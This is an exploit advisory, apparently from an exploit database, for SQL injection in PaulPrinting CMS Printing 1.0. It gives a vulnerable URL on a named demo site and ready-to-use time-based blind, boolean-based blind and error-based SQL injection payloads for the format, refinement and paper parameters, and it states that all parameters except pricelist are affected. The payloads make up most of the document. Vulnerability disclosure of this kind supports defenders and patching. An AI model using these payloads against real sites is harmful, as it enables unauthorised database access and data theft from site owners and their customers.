# Exploit Title: PaulPrinting CMS Printing 1.0 - SQL Injection# Exploit Date: 2018-05-19# Software Link: https://codecanyon.net/item/paulprinting-cms-printing-solutions/19546365# Author: Mehmet Onder Key# Version: 1.0# Tested On: Linux# 1. Description# Any visitor can run code to exploit css and sql vulnerabilities in the# products and order sections.# 2. Proof of Concept# Example parameter with demo site :http://demo.codepaul.com/# printing/products/businesscard?pricelist=1&format=90x50&pages=2p4cf&# paper=300g_ma&refinement=lamco# Time-Based Blind SQL Payload:format=keyney+akkus') OR SLEEP(5)-- DLea
# Boolean-Based Blind SQL Payload:
refinement=were') OR NOT 4134=4134## Error-Based SQL Payload
paper=here') OR (SELECT 1712 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT
(ELT(1712=1712,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oXDz
etc...(all parameter is effected -pricelist)
